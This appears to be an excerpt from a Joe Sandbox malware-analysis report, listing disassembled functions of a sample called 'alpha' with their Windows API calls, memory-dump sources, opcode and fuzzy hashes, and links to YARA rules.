                                                                                                                    Function 00007FF789BC6BE0 Relevance: 4.7, APIs: 3, Instructions: 184COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF789BCCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BCB9A1,?,?,?,?,00007FF789BCD81A), ref: 00007FF789BCCDA6
                                                                                                                      • Part of subcall function 00007FF789BCCD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF789BCB9A1,?,?,?,?,00007FF789BCD81A), ref: 00007FF789BCCDBD
                                                                                                                    • _pipe.MSVCRT ref: 00007FF789BC6C1E
                                                                                                                    • _get_osfhandle.MSVCRT ref: 00007FF789BC6CD1
                                                                                                                    • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF789BC6CFB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heapwcschr$AllocateDuplicateHandleProcess_dup_dup2_get_osfhandle_pipe_wcsicmpmemset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1037144754-0
                                                                                                                    • Opcode ID: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                                                                                                    • Instruction ID: a820dd19a9d895e1b73eca85135eb830b5a5eebf0a5c26bd0df902f96c610bc8
                                                                                                                    • Opcode Fuzzy Hash: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                                                                                                    • Instruction Fuzzy Hash: 9E717B31A0864A86E754BF35D84043CBAB1FF85F6AFA48234EA1D572D5CF3CA442C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BE63FC Relevance: 4.7, APIs: 3, Instructions: 179threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4268342597-0
                                                                                                                    • Opcode ID: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                                                                                                    • Instruction ID: 0e791dc2365079af5ce132903c6c48ea24b5aa05e5f1349113746e7c02b22b6f
                                                                                                                    • Opcode Fuzzy Hash: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                                                                                                    • Instruction Fuzzy Hash: 21814C22A1878AC6EA65AF26A44027DBBB4FF45F86FA84139E94D03754DF3DF440C760
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD88C0 Relevance: 4.6, APIs: 3, Instructions: 68nativethreadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: OpenToken$CloseProcessThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2991381754-0
                                                                                                                    • Opcode ID: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                                                                                                    • Instruction ID: 541eaf46e3a7c130ece1eb9846ba9569f61ebfcff4d7cf515e272f3fdb37be52
                                                                                                                    • Opcode Fuzzy Hash: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                                                                                                    • Instruction Fuzzy Hash: 46219E32A0864687E700AF94D4486BDFB70FB85BA2FA05135DB9943684DF7CD848CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC586C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF789BEC59E), ref: 00007FF789BC5879
                                                                                                                      • Part of subcall function 00007FF789BC58D4: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF789BC5903
                                                                                                                      • Part of subcall function 00007FF789BC58D4: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF789BC5943
                                                                                                                      • Part of subcall function 00007FF789BC58D4: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF789BC5956
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseOpenQueryValueVersion
                                                                                                                    • String ID: %d.%d.%05d.%d
                                                                                                                    • API String ID: 2996790148-3457777122
                                                                                                                    • Opcode ID: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                                                                                                    • Instruction ID: 5becd72f77fd03d1bc5c861680e118d6a6fc8fe1962d59d2eac0df2e96194dc5
                                                                                                                    • Opcode Fuzzy Hash: 4d5ad80169b63ecb9418821cd297058139bf77423c780748cae3bcfdcd848c3f
                                                                                                                    • Instruction Fuzzy Hash: 5FF0A761A0C38987D310AF16B54406AEB61FB84BD1FA08134D94907B5ACF3CD514CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD7854 Relevance: 3.3, APIs: 2, Instructions: 296COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$ErrorFileFindFirstLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2831795651-0
                                                                                                                    • Opcode ID: 43a4daf2934dc4b37ff691b1a4b1263eebb1773a1fb1ad015dd0d80b276b2dc6
                                                                                                                    • Instruction ID: 8dc54737c1016f54aaf368cdb801567dde9cab4c8a6d4405d7da4eacd1115599
                                                                                                                    • Opcode Fuzzy Hash: 43a4daf2934dc4b37ff691b1a4b1263eebb1773a1fb1ad015dd0d80b276b2dc6
                                                                                                                    • Instruction Fuzzy Hash: 05D1C472A1868A8AE760AF21E4582BABBB0FF44F99FA41135DE4D07794DF3CE541C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC7D30 Relevance: 3.3, APIs: 2, Instructions: 252COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 00007FF789BC7DA1
                                                                                                                      • Part of subcall function 00007FF789BD417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF789BD41AD
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF789BCD46E
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF789BCD485
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: wcschr.MSVCRT ref: 00007FF789BCD4EE
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: iswspace.MSVCRT ref: 00007FF789BCD54D
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: wcschr.MSVCRT ref: 00007FF789BCD569
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: wcschr.MSVCRT ref: 00007FF789BCD58C
                                                                                                                    • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF789BC7EB7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcschr$Heapmemset$AllocCurrentDirectoryProcessiswspace
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 168394030-0
                                                                                                                    • Opcode ID: a65c63928f551fb8768bc8e3d10b498b84304c82453fdb636945e23039fb0caa
                                                                                                                    • Instruction ID: bffe85a56a3e52f02e1374fe6c76230bbe300e87f4fbd6023e6974a0e5186215
                                                                                                                    • Opcode Fuzzy Hash: a65c63928f551fb8768bc8e3d10b498b84304c82453fdb636945e23039fb0caa
                                                                                                                    • Instruction Fuzzy Hash: 41A12921B0865A86FB64AF26D4542B9ABB1FF84F9AFE04135D91D47AE5DF3CE401C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD89E4 Relevance: 3.0, APIs: 2, Instructions: 43nativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InformationQueryToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4239771691-0
                                                                                                                    • Opcode ID: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                                                                                                    • Instruction ID: d5392e6fac1c4a0a058b588dc49e24e5beeb959fc451505c86c49bff6770aa7b
                                                                                                                    • Opcode Fuzzy Hash: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                                                                                                    • Instruction Fuzzy Hash: 49112E72A18785CBFB109F41E4043A9FBB4FB85B96F504131DB4C02694DB7DD588CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD8114 Relevance: 3.0, APIs: 2, Instructions: 41filenativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileInformation$HandleQueryVolume
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2149833895-0
                                                                                                                    • Opcode ID: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                                                                                    • Instruction ID: 9ffc22abf1efbc5d718afb1705005e285f44ab96e3f7163fae1170b1ba7d4606
                                                                                                                    • Opcode Fuzzy Hash: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                                                                                    • Instruction Fuzzy Hash: A1114C3260868686E7609F60F4457AAFBA0FB88B86F945531DA9D42A54DBBCD448CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC8510 Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF789BCD46E
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF789BCD485
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: wcschr.MSVCRT ref: 00007FF789BCD4EE
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: iswspace.MSVCRT ref: 00007FF789BCD54D
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: wcschr.MSVCRT ref: 00007FF789BCD569
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: wcschr.MSVCRT ref: 00007FF789BCD58C
                                                                                                                    • towupper.MSVCRT ref: 00007FF789BC85D4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcschr$Heap$AllocProcessiswspacetowupper
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3520273530-0
                                                                                                                    • Opcode ID: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                                                                                                    • Instruction ID: 6a55d5f1bbd22b77a62996d2524275cea64677c54bc1492969554b13a453c86e
                                                                                                                    • Opcode Fuzzy Hash: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                                                                                                    • Instruction Fuzzy Hash: 0361A222A0C21A86E764BF24E51437DBEB0FF45F6AFA04136DA1E562D5DE3CE480D321
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD898C Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InformationQueryToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4239771691-0
                                                                                                                    • Opcode ID: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                                                                                                    • Instruction ID: 29d86dd88ad764e5e292263a81e45639130e8f2460f63046edfe1ee1e11cb781
                                                                                                                    • Opcode Fuzzy Hash: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                                                                                                    • Instruction Fuzzy Hash: 0DF030B7704B81CBD7009F64E58849CBB78F744B857A5853ACB6803704DB75D9A4CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD93B0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF789BD93BB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3192549508-0
                                                                                                                    • Opcode ID: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                                                                                                    • Instruction ID: 4966ab45ee22eba1397c0201d902f8098cba3b8af49ef3e9197d7a993f05825b
                                                                                                                    • Opcode Fuzzy Hash: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                                                                                                    • Instruction Fuzzy Hash: F2B01210F26406D1D604BF31DC8506056B07F9CF22FE00431C00EC4160EF2C91DBC710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BCF8C0 Relevance: 40.6, APIs: 21, Strings: 2, Instructions: 380COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF789BCF52A,00000000,00000000,?,00000000,?,00007FF789BCE626,?,?,00000000,00007FF789BD1F69), ref: 00007FF789BCF8DE
                                                                                                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF789BD1F69,?,?,?,?,?,?,?,00007FF789BC286E,00000000,00000000,00000000,00000000), ref: 00007FF789BCF8FB
                                                                                                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF789BD1F69,?,?,?,?,?,?,?,00007FF789BC286E,00000000,00000000,00000000,00000000), ref: 00007FF789BCF951
                                                                                                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF789BD1F69,?,?,?,?,?,?,?,00007FF789BC286E,00000000,00000000,00000000,00000000), ref: 00007FF789BCF96B
                                                                                                                    • wcschr.MSVCRT ref: 00007FF789BCFA8E
                                                                                                                    • _get_osfhandle.MSVCRT ref: 00007FF789BCFB14
                                                                                                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF789BD1F69,?,?,?,?,?,?,?,00007FF789BC286E,00000000,00000000,00000000,00000000), ref: 00007FF789BCFB2D
                                                                                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF789BD1F69,?,?,?,?,?,?,?,00007FF789BC286E,00000000,00000000,00000000,00000000), ref: 00007FF789BCFBEA
                                                                                                                    • _get_osfhandle.MSVCRT ref: 00007FF789BCF996
                                                                                                                      • Part of subcall function 00007FF789BD0010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF789BE849D,?,?,?,00007FF789BEF0C7), ref: 00007FF789BD0045
                                                                                                                      • Part of subcall function 00007FF789BD0010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF789BEF0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF789BEE964), ref: 00007FF789BD0071
                                                                                                                      • Part of subcall function 00007FF789BD0010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF789BD0092
                                                                                                                      • Part of subcall function 00007FF789BD0010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF789BD00A7
                                                                                                                      • Part of subcall function 00007FF789BD0010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF789BD0181
                                                                                                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF789BD1F69,?,?,?,?,?,?,?,00007FF789BC286E,00000000,00000000,00000000,00000000), ref: 00007FF789BDD401
                                                                                                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF789BD1F69,?,?,?,?,?,?,?,00007FF789BC286E,00000000,00000000,00000000,00000000), ref: 00007FF789BDD41B
